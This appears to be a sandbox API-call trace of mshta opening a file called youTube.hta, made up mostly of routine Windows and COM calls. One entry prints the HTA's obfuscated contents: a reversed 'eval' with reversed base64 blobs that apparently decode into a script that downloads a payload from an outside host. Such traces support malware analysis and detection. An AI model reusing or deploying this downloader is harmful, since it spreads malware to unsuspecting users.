[0195.288] IInternetProtocolSink:ReportData (This=0x6dae64, grfBSCF=0x5, ulProgress=0xd0e, ulProgressMax=0xd0e) returned 0x0
[0195.288] IUnknown:QueryInterface (in: This=0x6c5dd8, riid=0x6dc9e90c*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19cf68 | out: ppvObject=0x19cf68*=0x0) returned 0x80004002
[0195.288] IUnknown:QueryInterface (in: This=0x6c5dd8, riid=0x6dc9e934*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19cf78 | out: ppvObject=0x19cf78*=0x0) returned 0x80004002
[0195.289] IUnknown:Release (This=0x6dae64) returned 0x7
[0195.289] IUnknown:AddRef (This=0x6dae64) returned 0x8
[0195.289] IInternetProtocolSink:ReportResult (This=0x6dae64, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0
[0195.289] IUnknown:Release (This=0x6dae64) returned 0x7
[0195.289] IUnknown:Release (This=0x6dae64) returned 0x6
[0195.292] IUnknown:Release (This=0x6c4c5c) returned 0x13
[0195.293] IUnknown:Release (This=0x6c0b60) returned 0x1
[0195.293] IUnknown:Release (This=0x6c4c5c) returned 0x12
[0195.349] IUnknown:Release (This=0x6c4c5c) returned 0x11
[0195.349] CoTaskMemFree (pv=0x0)
[0195.349] GetCurrentThreadId () returned 0x7a0
[0195.349] GetCurrentProcessId () returned 0x7a4
[0195.350] GetCurrentThreadId () returned 0x7a0
[0195.350] memcpy_s (in: _Destination=0x19f6f4, _DestinationSize=0xc, _Source=0x6450ce0, _SourceSize=0xc | out: _Destination=0x19f6f4) returned 0x0
[0195.350] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x68) returned 0x6daee8
[0195.350] MulDiv (nNumber=3342, nNumerator=4000, nDenominator=3342) returned 4000
[0195.351] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.351] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.351] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.352] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x5c) returned 0x6df750
[0195.352] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6da370
[0195.352] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x100) returned 0x6df7b8
[0195.352] IUnknown:QueryInterface (in: This=0x6c5dd8, riid=0x6ddc2570*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19f46c | out: ppvObject=0x19f46c*=0x6c5dd8) returned 0x0
[0195.353] IInternetProtocol:Read (in: This=0x6c5dd8, pv=0x6df7c4, cb=0xc8, pcbRead=0x19f564 | out: pv=0x6df7c4, pcbRead=0x19f564*=0xc8) returned 0x0
[0195.354] IUnknown:Release (This=0x6c5dd8) returned 0x2
[0195.354] memcpy_s (in: _Destination=0x19f60c, _DestinationSize=0xc8, _Source=0x6df7c4, _SourceSize=0xc8 | out: _Destination=0x19f60c) returned 0x0
[0195.355] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6ed33704 | out: lpflOldProtect=0x6ed33704*=0x2) returned 1
[0195.355] GetProcAddress (hModule=0x70a40000, lpProcName="CoInternetIsFeatureEnabledForUrl") returned 0x70aa7870
[0195.355] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f504 | out: lpflOldProtect=0x19f504*=0x4) returned 1
[0195.356] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/RDhJ0CNFevzX/Documents/youTube.hta", pSecMgr=0x0) returned 0x1
[0195.357] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6ed33704 | out: lpflOldProtect=0x6ed33704*=0x2) returned 1
[0195.357] GetProcAddress (hModule=0x70a40000, lpProcName="ReleaseBindInfo") returned 0x70a6e690
[0195.362] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f510 | out: lpflOldProtect=0x19f510*=0x4) returned 1
[0195.363] ReleaseBindInfo (pbindinfo=0x19f5b8)
[0195.370] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6ed33704 | out: lpflOldProtect=0x6ed33704*=0x2) returned 1
[0195.371] GetProcAddress (hModule=0x70a40000, lpProcName="FindMimeFromData") returned 0x70ab68a0
[0195.371] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f4c4 | out: lpflOldProtect=0x19f4c4*=0x4) returned 1
[0195.371] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\RDhJ0CNFevzX\\Documents\\youTube.hta", pBuffer=0x19f60c, cbSize=0xc8, pwzMimeProposed="application/hta", dwMimeFlags=0x6, ppwzMimeOut=0x19f564, dwReserved=0x0 | out: ppwzMimeOut=0x19f564*="application/hta") returned 0x0
[0195.379] CoTaskMemFree (pv=0x6c6730)
[0195.379] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/RDhJ0CNFevzX/Documents/youTube.hta", pSecMgr=0x0) returned 0x1
[0195.380] StrCmpNIW (lpStr1="applic", lpStr2="image/", nChar=6) returned -1
[0195.380] GetCurrentThreadId () returned 0x7a0
[0195.380] GetCurrentThreadId () returned 0x7a0
[0195.381] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f48c | out: lpCPInfo=0x19f48c) returned 1
[0195.381] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/hta", cchCount1=7, lpString2="charset", cchCount2=7) returned 1
[0195.381] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1006) returned 0x6c6ad0
[0195.381] memcpy_s (in: _Destination=0x6c6ad0, _DestinationSize=0x1000, _Source=0x6df7c4, _SourceSize=0xc8 | out: _Destination=0x6c6ad0) returned 0x0
[0195.381] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6df7b8, Size=0x4000) returned 0x6dfc10
[0195.382] IUnknown:QueryInterface (in: This=0x6c5dd8, riid=0x6ddc2570*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19f33c | out: ppvObject=0x19f33c*=0x6c5dd8) returned 0x0
[0195.383] IInternetProtocol:Read (in: This=0x6c5dd8, pv=0x6dfce4, cb=0xf38, pcbRead=0x19f430 | out: pv=0x6dfce4, pcbRead=0x19f430*=0xc46) returned 0x1
[0195.383] IUnknown:Release (This=0x6c5dd8) returned 0x2
[0195.383] memcpy_s (in: _Destination=0x6c6b98, _DestinationSize=0xf38, _Source=0x6dfce4, _SourceSize=0xc46 | out: _Destination=0x6c6b98) returned 0x0
[0195.384] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2000) returned 0x6e3c18
[0195.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6c6ad0, cbMultiByte=3342, lpWideCharStr=0x6e3c18, cchWideChar=3342 | out: lpWideCharStr="lave
=YXYyBCZvdXWvVHI9AibldHIBNGdpZXZY9kYqV2Y0hiItNHetxmMugXbshGd0BnIpsDZvdXWvVnLvBXZuhiIHVEViwCIigGd0BnOv8ydp5mcl5Gdhx2cyATM3ImLj9WbvQXZnp3LRJzN3E2R3Y0aOlDcBNWYXRkZGx2ROJUZ1FWcHVGZ4k2LiF2VlhHVR92R5FUQ6xkUvEUVxgVRyJXVxYUa0pmaWhjQCFWU1VWb2UzctFFWZZXek9iN0AjNz8yZ2YmSZx0RIJlVXB3NzFDd2hkbaRmdvg1YqNWWDpmQYhDdQFWQMNHapRUQ4hTNQVUcvMWYiNzPyVmZ9ADdmclePpVP5gXeBlGZOZiezQWOPJGM9U0dBV1aVVlT5h0crZSdzVmc9QjWrlHO54mJjlGZ9IWR1klQPZUeaZ3VIJ2R2lzdQJ3NRZVbmEXPsl1anplTHl1baBXd5ICLgYWYsNXZpsDZvdXWvVnLzVmbkhSK7kmZoQ2b3l1b15yc0FGd1NHI90DIyADMpsHdyl3e2FmcgcWayxGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKiEGZvRmYuMHdyVWYtJSK7cWayxGTvZXZu8Gcl52Onlmcsx0b2VmL0lHclBSPgEzOnlmcsx0b2VmL3JXa0VGKk92dZ9WduIXZzB3buNXZi9GZ5lyOnlmcsx0b2VmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcR2b35UZ4RnLqB3ZiwCIykyOnlmcsx0b2VmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHIs9mdlxUarVGI9AibldHIBNGdpZXZY9kYqV2Y0hiI3N3YylGc05ycoVGbsJSK7YXYyByahJ3bsR0b3B1b3BSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7w2b2VGTptWZuIXduhiIyV2ZzZnczIDIjpDXcV3clJ3ccxFc1JGbpNGXcR2b35UZ4RnLqB3ZikyO
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
\r\n") returned 3342
[0195.385] GetCurrentThreadId () returned 0x7a0
[0195.508] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e3c18 | out: hHeap=0x6b0000) returned 1
[0195.508] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6c6ad0 | out: hHeap=0x6b0000) returned 1
[0195.508] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.509] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.509] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.509] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.509] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.509] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.510] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.510] GetCurrentThreadId () returned 0x7a0
[0195.510] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.510] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6ed33704 | out: lpflOldProtect=0x6ed33704*=0x2) returned 1
[0195.511] GetProcAddress (hModule=0x70a40000, lpProcName=0x1be) returned 0x70aac820
[0195.511] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f42c | out: lpflOldProtect=0x19f42c*=0x4) returned 1
[0195.511] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.511] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f3e4 | out: lpCPInfo=0x19f3e4) returned 1
[0195.511] IUnknown:AddRef (This=0x6c52e0) returned 0x4
[0195.511] IUnknown:AddRef (This=0x6c4c5c) returned 0x12
[0195.512] IUnknown:QueryInterface (in: This=0x6c4c5c, riid=0x6dcd333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f3b8 | out: ppvObject=0x19f3b8*=0x6c4c5c) returned 0x0
[0195.512] IUnknown:Release (This=0x6c4c5c) returned 0x12
[0195.512] IUnknown:AddRef (This=0x6c4c5c) returned 0x13
[0195.512] IUri:GetScheme (in: This=0x6c4c5c, pdwScheme=0x19f3fc | out: pdwScheme=0x19f3fc*=0x9) returned 0x0
[0195.512] IUri:GetScheme (in: This=0x6c4c5c, pdwScheme=0x19f3dc | out: pdwScheme=0x19f3dc*=0x9) returned 0x0
[0195.512] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/hta", cchCount1=7, lpString2="charset", cchCount2=7) returned 1
[0195.513] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.513] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x29c
[0195.513] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2a4
[0195.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6e2fcca0, lpParameter=0x640c3c0, dwCreationFlags=0x0, lpThreadId=0x640c3d4 | out: lpThreadId=0x640c3d4*=0xdf4) returned 0x2ec
[0195.514] GetCurrentThreadId () returned 0x7a0
[0195.514] SetEvent (hEvent=0x29c) returned 1
[0195.514] GetCurrentThreadId () returned 0x7a0
[0195.515] IUnknown:Release (This=0x6c4c5c) returned 0x12
[0195.515] IUnknown:Release (This=0x6d9db4) returned 0x2
[0195.515] IUnknown:Release (This=0x6c2280) returned 0x3
[0195.515] IUnknown:Release (This=0x6c4c5c) returned 0x11
[0195.515] IUnknown:Release (This=0x6c4c5c) returned 0x10
[0195.515] IUnknown:Release (This=0x6c4c5c) returned 0xf
[0195.515] IUnknown:Release (This=0x6c2280) returned 0x2
[0195.515] IUnknown:Release (This=0x6c4c5c) returned 0xe
[0195.515] CoTaskMemFree (pv=0x6d98c0)
[0195.515] CoTaskMemFree (pv=0x0)
[0195.515] IUnknown:Release (This=0x6c4c5c) returned 0xd
[0195.515] CoTaskMemFree (pv=0x6d27a8)
[0195.516] GetClientRect (in: hWnd=0x40264, lpRect=0x19fe24 | out: lpRect=0x19fe24) returned 1
[0195.516] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.516] GetClientRect (in: hWnd=0x40264, lpRect=0x641c12c | out: lpRect=0x641c12c) returned 1
[0195.516] OffsetRect (in: lprc=0x641c12c, dx=0, dy=0 | out: lprc=0x641c12c) returned 1
[0195.516] OffsetRect (in: lprc=0x641c13c, dx=0, dy=0 | out: lprc=0x641c13c) returned 1
[0195.517] RegisterClassExW (param_1=0x19faf0) returned 0xc0f0
[0195.517] CoCreateInstance (in: rclsid=0x6dcc3048*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x6dcc3038*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x6ee33c74 | out: ppv=0x6ee33c74*=0x6c6a50) returned 0x0
[0195.883] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x6c6a50, aaClassList=0x19fbc4*=0xc0f0, uSize=0x1) returned 0x0
[0195.883] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc0f0, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=585, hWndParent=0x40264, hMenu=0x0, hInstance=0x6dc70000, lpParam=0x6420000) returned 0x3029a
[0195.884] SetWindowLongW (hWnd=0x3029a, nIndex=-21, dwNewLong=104988672) returned 0
[0195.884] GetWindowLongW (hWnd=0x3029a, nIndex=-20) returned 0
[0195.884] GetAncestor (hwnd=0x3029a, gaFlags=0x2) returned 0x40264
[0195.884] GetWindowLongW (hWnd=0x40264, nIndex=-20) returned 262400
[0195.884] GetWindowLongW (hWnd=0x3029a, nIndex=-20) returned 0
[0195.884] GetParent (hWnd=0x3029a) returned 0x40264
[0195.885] GetWindowLongW (hWnd=0x40264, nIndex=-20) returned 262400
[0195.885] GetParent (hWnd=0x40264) returned 0x403c0
[0195.885] GetWindowLongW (hWnd=0x403c0, nIndex=-20) returned 256
[0195.885] GetParent (hWnd=0x403c0) returned 0x0
[0195.885] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x6c6a50, hWnd=0x3029a, msg=0x81, wParam=0x0, lParam=0x19f750*=104988672, plResult=0x19f58c | out: plResult=0x19f58c) returned 0x1
[0195.885] NtdllDefWindowProc_W () returned 0x1
[0195.885] GetCurrentThreadId () returned 0x7a0
[0195.885] GetWindowLongW (hWnd=0x3029a, nIndex=-21) returned 104988672
[0195.886] GetCurrentThreadId () returned 0x7a0
[0195.886] GetWindowLongW (hWnd=0x3029a, nIndex=-21) returned 104988672
[0195.886] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x6c6a50, hWnd=0x3029a, msg=0x1, wParam=0x0, lParam=0x19f750*=104988672, plResult=0x19f58c | out: plResult=0x19f58c) returned 0x1
[0195.886] NtdllDefWindowProc_W () returned 0x0
[0195.886] GetCurrentThreadId () returned 0x7a0
[0195.886] GetWindowLongW (hWnd=0x3029a, nIndex=-21) returned 104988672
[0195.886] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x6c6a50, hWnd=0x3029a, msg=0x5, wParam=0x0, lParam=0x2490428, plResult=0x19f5d8 | out: plResult=0x19f5d8) returned 0x1
[0195.886] NtdllDefWindowProc_W () returned 0x0
[0195.887] GetCurrentThreadId () returned 0x7a0
[0195.887] GetWindowLongW (hWnd=0x3029a, nIndex=-21) returned 104988672
[0195.887] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x6c6a50, hWnd=0x3029a, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x19f5d8 | out: plResult=0x19f5d8) returned 0x1
[0195.887] NtdllDefWindowProc_W () returned 0x0
[0195.887] GetCurrentThreadId () returned 0x7a0
[0195.887] NtdllDefWindowProc_W () returned 0x0
[0195.887] GetWindowRect (in: hWnd=0x3029a, lpRect=0x19f9a8 | out: lpRect=0x19f9a8) returned 1
[0195.887] GetParent (hWnd=0x3029a) returned 0x40264
[0195.887] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x40264, lpPoints=0x19f9a8, cPoints=0x2 | out: lpPoints=0x19f9a8) returned -10485898
[0195.887] GetClassNameW (in: hWnd=0x40264, lpClassName=0x19f9b8, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34
[0195.887] GetWindowThreadProcessId (in: hWnd=0xa01d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7a0
[0195.888] GetCurrentThreadId () returned 0x7a0
[0195.888] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x6c6a50, fRestoreLayout=1) returned 0x0
[0195.888] SendMessageW (hWnd=0x3029a, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0
[0195.888] GetWindowLongW (hWnd=0x3029a, nIndex=-21) returned 104988672
[0195.888] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x6c6a50, hWnd=0x3029a, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x19fa74 | out: plResult=0x19fa74) returned 0x1
[0195.888] NtdllDefWindowProc_W () returned 0x0
[0195.888] GetCurrentThreadId () returned 0x7a0
[0195.888] LoadLibraryExW (lpLibFileName="ext-ms-win-ntuser-touch-hittest-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x74790000
[0195.888] GetProcAddress (hModule=0x74790000, lpProcName="RegisterTouchHitTestingWindow") returned 0x747cc9a0
[0195.888] RegisterTouchHitTestingWindow (hwnd=0x3029a, value=0x1) returned 1
[0195.889] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.889] QISearch (in: that=0x641e480, pqit=0x6dc9ca98, riid=0x6dc9caa8*(Data1=0xa5200748, Data2=0x18ae, Data3=0x4da5, Data4=([0]=0x93, [1]=0xaf, [2]=0x0, [3]=0x19, [4]=0x47, [5]=0x70, [6]=0x3, [7]=0xa1)), ppv=0x6420e00 | out: that=0x641e480, ppv=0x6420e00*=0x641e480) returned 0x0
[0195.890] IntersectRect (in: lprcDst=0x19fc24, lprcSrc1=0x641c12c, lprcSrc2=0x641c13c | out: lprcDst=0x19fc24) returned 1
[0195.890] EqualRect (lprc1=0x19fc24, lprc2=0x641c12c) returned 1
[0195.890] InvalidateRect (hWnd=0x3029a, lpRect=0x0, bErase=1) returned 1
[0195.890] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x9990) returned 0x6ed528
[0195.891] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x110) returned 0x6f6ec0
[0195.891] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xb0) returned 0x6f6fd8
[0195.891] InitOnceExecuteOnce (in: InitOnce=0x6ee3927c, InitFn=0x6e32e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6ee3927c, Parameter=0x0, Context=0x0) returned 1
[0195.891] GetProcessHeap () returned 0x6b0000
[0195.891] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x30) returned 0x6d0fa0
[0195.891] GetCurrentProcessId () returned 0x7a4
[0195.891] ProcessIdToSessionId (in: dwProcessId=0x7a4, pSessionId=0x19faec | out: pSessionId=0x19faec) returned 1
[0195.891] WTSGetActiveConsoleSessionId () returned 0x1
[0195.891] EnumDisplaySettingsW (in: lpszDeviceName=0x0, iModeNum=0xffffffff, lpDevMode=0x19fb18 | out: lpDevMode=0x19fb18) returned 1
[0195.894] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.894] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.895] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.895] GetWindowThreadProcessId (in: hWnd=0xa01d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7a0
[0195.895] GetCurrentThreadId () returned 0x7a0
[0195.895] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x90) returned 0x6f7090
[0195.895] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x34) returned 0x6ebc40
[0195.896] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.896] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6da280
[0195.896] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.896] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.896] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.896] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x6c) returned 0x6f7128
[0195.897] memcpy_s (in: _Destination=0x19efe0, _DestinationSize=0xc28, _Source=0x6ee393e0, _SourceSize=0xc28 | out: _Destination=0x19efe0) returned 0x0
[0195.900] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.900] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.900] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.900] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6ed33704 | out: lpflOldProtect=0x6ed33704*=0x2) returned 1
[0195.901] GetProcAddress (hModule=0x76150000, lpProcName=0x8) returned 0x76162590
[0195.901] VirtualProtect (in: lpAddress=0x6ee47000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ee14 | out: lpflOldProtect=0x19ee14*=0x4) returned 1
[0195.902] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.903] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.903] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.903] QueryPerformanceCounter (in: lpPerformanceCount=0x64209e0 | out: lpPerformanceCount=0x64209e0*=3013064557330) returned 1
[0195.903] GetCurrentThreadId () returned 0x7a0
[0195.903] GetCurrentThreadId () returned 0x7a0
[0195.903] GetCurrentThreadId () returned 0x7a0
[0195.905] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb98 | out: lpPerformanceCount=0x19fb98*=3013064712432) returned 1
[0195.905] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.905] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb1c | out: lpPerformanceCount=0x19fb1c*=3013064740465) returned 1
[0195.905] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb08 | out: lpPerformanceCount=0x19fb08*=3013064750905) returned 1
[0195.905] QueryPerformanceCounter (in: lpPerformanceCount=0x19faac | out: lpPerformanceCount=0x19faac*=3013064756869) returned 1
[0195.905] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.905] SetCoalescableTimer (hWnd=0xa01d6, nIDEvent=0x2002, uElapse=0x1f4, lpTimerFunc=0x0, uToleranceDelay=0x0) returned 0x2002
[0195.905] GetWindowThreadProcessId (in: hWnd=0xa01d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7a0
[0195.905] GetCurrentThreadId () returned 0x7a0
[0195.905] QueryPerformanceCounter (in: lpPerformanceCount=0x19faa4 | out: lpPerformanceCount=0x19faa4*=3013064801137) returned 1
[0195.906] QueryPerformanceCounter (in: lpPerformanceCount=0x19f9c4 | out: lpPerformanceCount=0x19f9c4*=3013064816419) returned 1
[0195.906] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.906] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.906] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.906] RtlTryEnterCriticalSection (CriticalSection=0x862760) returned 1
[0195.906] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x304
[0195.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6e2fcca0, lpParameter=0x645c000, dwCreationFlags=0x0, lpThreadId=0x645c014 | out: lpThreadId=0x645c014*=0x4dc) returned 0x300
[0195.907] SetEvent (hEvent=0x304) returned 1
[0195.907] WTSGetActiveConsoleSessionId () returned 0x1
[0195.907] QueryPerformanceFrequency (in: lpFrequency=0x19f918 | out: lpFrequency=0x19f918*=100000000) returned 1
[0195.907] QueryPerformanceCounter (in: lpPerformanceCount=0x19f910 | out: lpPerformanceCount=0x19f910*=3013064973470) returned 1
[0195.907] _vsnwprintf (in: _Buffer=0x19f9a0, _BufferCount=0x4f, _Format="VSyncHelper-%p-%I64x", _ArgList=0x19f92c | out: _Buffer="VSyncHelper-006D0FA0-703ed3a86") returned 30
[0195.907] RegisterClassW (lpWndClass=0x19f978) returned 0xc243
[0195.908] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc243, lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x6d0fa0) returned 0x203d8
[0195.909] GetWindowLongW (hWnd=0x203d8, nIndex=-21) returned 0
[0195.909] NtdllDefWindowProc_W () returned 0x0
[0195.909] GetWindowLongW (hWnd=0x203d8, nIndex=-21) returned 0
[0195.909] NtdllDefWindowProc_W () returned 0x1
[0195.910] GetWindowLongW (hWnd=0x203d8, nIndex=-21) returned 0
[0195.910] NtdllDefWindowProc_W () returned 0x0
[0195.911] GetWindowLongW (hWnd=0x203d8, nIndex=-21) returned 0
[0195.911] NtdllDefWindowProc_W () returned 0x0
[0195.911] SetWindowLongW (hWnd=0x203d8, nIndex=-21, dwNewLong=7147424) returned 0
[0195.911] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x308
[0195.911] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x8000004, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x28, lpName=0x0) returned 0x30c
[0195.912] MapViewOfFile (hFileMappingObject=0x30c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x28) returned 0xb90000
[0195.912] GetCurrentProcessId () returned 0x7a4
[0195.912] GetCurrentThreadId () returned 0x7a0
[0195.912] GetProcessHeap () returned 0x6b0000
[0195.912] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x90) returned 0x6f71a0
[0195.912] GetSystemTimeAdjustment (in: lpTimeAdjustment=0x19f898, lpTimeIncrement=0x19f8ac, lpTimeAdjustmentDisabled=0x19f89c | out: lpTimeAdjustment=0x19f898, lpTimeIncrement=0x19f8ac, lpTimeAdjustmentDisabled=0x19f89c) returned 1
[0195.912] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x310
[0195.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6e057440, lpParameter=0x6f71a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x314
